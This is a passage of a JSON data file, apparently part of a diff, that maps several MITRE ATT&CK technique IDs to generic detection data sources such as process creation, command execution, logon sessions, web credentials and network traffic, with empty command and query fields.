"data_source": "process", + 
"definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1606.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + 
"possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + 
"relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential creation", + "description": "A web credential was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "web credential" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential usage", + "description": "A web credential was used.", + "source_data_element": "user", + "relationship": "attempted to use", + "target_data_element": "web credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4", + "https://auth0.com/docs/tokens/access-tokens" + ] + ] + }, + { + "technique_id": "T1606", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + 
"Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web 
credential creation", + "description": "A web credential was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "web credential" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential usage", + "description": "A web credential was used.", + "source_data_element": "user", + "relationship": "attempted to use", + "target_data_element": "web credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4", + "https://auth0.com/docs/tokens/access-tokens" + ] + ] + }, + { + "technique_id": "T1059.008", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + 
"Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1602.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1542.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + 
"definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + 